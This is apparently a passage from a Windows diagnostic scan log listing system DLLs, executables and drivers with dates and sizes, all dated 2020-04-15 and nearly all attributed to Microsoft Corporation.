2020-04-15 16:45 - 2020-04-15 16:45 - 001477112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dcomp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001458688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001427456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Vpn.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001413840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001413704 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001397576 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001378528 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wpc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001318912 _____ (Microsoft Corporation) C:\Windows\system32\wpnapps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001300280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 001263856 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001261808 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001257472 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001245184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001243648 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001180672 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001153024 _____ (Microsoft Corporation) C:\Windows\system32\windowsperformancerecordercontrol.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001136128 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApiPublic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001127424 _____ (Microsoft Corporation) C:\Windows\system32\WpcRefreshTask.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001083904 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001081856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Vpn.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001077064 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001071616 _____ (Microsoft Corporation) C:\Windows\system32\BTAGService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001055376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001011200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001009152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpnapps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001008128 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000993280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000982840 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000980832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000974336 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000924672 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000923136 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000915192 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000912896 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000893952 _____ (Microsoft Corporation) C:\Windows\system32\FlightSettings.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000892416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApiPublic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000879616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Service.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000874296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000868864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windowsperformancerecordercontrol.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000865280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000865280 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000840704 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Language.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000836608 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000822208 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000811320 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000785920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000783480 _____ (Microsoft Corporation) C:\Windows\system32\tcblaunch.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000775696 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000772096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000768528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000759272 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000747320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000735744 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000729600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FlightSettings.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000722072 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BTAGService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000684560 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000673704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000673464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000668672 _____ (Microsoft Corporation) C:\Windows\system32\wsecedit.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000654912 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000647680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000638480 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000637240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000632832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000629760 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000628616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000618296 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000605184 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000604984 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000595968 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000589384 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000561464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000555008 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
2020-04-15 16:45 - 2020-04-15 16:45 - 000550400 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000538160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000532480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000530432 _____ (Microsoft Corporation) C:\Windows\system32\sppcext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000529408 _____ (Microsoft Corporation) C:\Windows\system32\nltest.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000524264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Enumeration.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000516096 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000515600 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000513576 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000510792 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000507152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000498688 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000497152 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000491008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppcext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000487784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000477496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-04-15 16:45 - 2020-04-15 16:45 - 000469504 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000465208 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000459688 _____ (Microsoft Corporation) C:\Windows\system32\MusNotifyIcon.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000456504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000452096 _____ (Microsoft Corporation) C:\Windows\system32\rdpclip.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000441144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000437560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000416016 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000415760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aepic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000410112 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000408064 _____ (Microsoft Corporation) C:\Windows\system32\domgmt.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000406480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Enumeration.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000401408 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntshrui.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000374784 _____ (Microsoft Corporation) C:\Windows\system32\ncbservice.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000355840 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicSvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\WpcApi.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000343552 _____ (Microsoft Corporation) C:\Windows\system32\wpr.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000339304 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Storage.ApplicationData.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000330240 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000324408 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32k.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000323584 _____ (Microsoft Corporation) C:\Windows\system32\sppcommdlg.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000297272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000285184 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicCapsule.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000278016 _____ (Microsoft Corporation) C:\Windows\system32\WpcTok.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000277864 _____ (Microsoft Corporation) C:\Windows\system32\LsaIso.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000277504 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000268288 _____ (Microsoft Corporation) C:\Windows\system32\dot3svc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000268008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Storage.ApplicationData.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000265216 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000259776 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000259072 _____ (Microsoft Corporation) C:\Windows\system32\VPNv2CSP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\UpdateDeploymentProvider.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000251704 _____ (Microsoft Corporation) C:\Windows\system32\offlinesam.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000251392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winnat.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000241152 _____ (Microsoft Corporation) C:\Windows\system32\policymanagerprecheck.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000234496 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\InstallServiceTasks.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000231912 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\IndexedDbLegacy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000214528 _____ (Microsoft Corporation) C:\Windows\system32\srumsvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scecli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000211256 _____ (Microsoft Corporation) C:\Windows\system32\tcbloader.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000203264 _____ (Microsoft Corporation) C:\Windows\system32\LanguageComponentsInstaller.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000200192 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\Win32CompatibilityAppraiserCSP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000193848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000190048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logoncli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000185952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallServiceTasks.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000179712 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000178192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\SpatialAudioLicenseSrv.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000164368 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\umpo.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000152408 _____ (Microsoft Corporation) C:\Windows\system32\KerbClientShared.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000151352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scmbus.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000147696 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000142544 _____ (Microsoft Corporation) C:\Windows\system32\LicensingUI.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\slc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000139776 _____ (Microsoft Corporation) C:\Windows\system32\Chakrathunk.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000138752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\t2embed.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000136192 _____ (Microsoft Corporation) C:\Windows\system32\sppc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\StorageUsage.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000129024 _____ (Microsoft Corporation) C:\Windows\system32\UtcDecoderHost.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000127280 _____ (Microsoft Corporation) C:\Windows\system32\win32u.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000123952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KerbClientShared.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000122368 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000115120 _____ (Microsoft Corporation) C:\Windows\system32\phoneactivate.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000108032 _____ (Microsoft Corporation) C:\Windows\system32\wwanprotdim.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\utcutil.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000103936 _____ (Microsoft Corporation) C:\Windows\system32\dot3msm.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000102216 _____ (Microsoft Corporation) C:\Windows\system32\changepk.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000101888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000096768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000093712 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\dot3api.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000089912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000089336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32u.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicAgent.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000088352 _____ (Microsoft Corporation) C:\Windows\system32\remoteaudioendpoint.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000087552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3api.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3msm.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000087040 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000084280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\autopilot.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000071480 _____ (Microsoft Corporation) C:\Windows\system32\win32appinventorycsp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\keepaliveprovider.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000066624 _____ (Microsoft Corporation) C:\Windows\system32\iumcrypt.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\srumapi.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\mf3216.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\CloudNotifications.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000059192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storufs.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000058880 _____ C:\Windows\system32\runexehelper.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\audioresourceregistrar.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000051200 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000050544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudNotifications.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\iaspolcy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000047000 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000046080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf3216.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\cmintegrator.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.Common.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\WiredNetworkCSP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\UpgradeResultsUI.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\WpcProxyStubs.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000036152 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\sxssrv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000033080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hwpolicy.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\ias.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\KNetPwrDepBroker.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmintegrator.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000029184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicPS.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\flpydisk.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.ps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\slcext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\sbservicetrigger.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000021520 _____ (Microsoft Corporation) C:\Windows\system32\kdhvcom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slcext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sfloppy.sys
